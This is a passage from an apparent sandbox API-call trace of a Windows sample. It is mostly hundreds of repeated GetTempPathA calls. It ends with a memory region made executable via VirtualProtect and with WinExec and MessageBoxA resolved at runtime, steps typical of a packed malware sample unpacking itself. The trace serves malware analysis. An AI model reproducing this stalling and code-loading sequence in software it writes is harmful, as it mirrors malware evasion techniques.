nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.908] VirtualProtect (in: lpAddress=0x1b35b0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0099.909] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.909] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0099.910] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0099.910] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0099.910] GetProcAddress 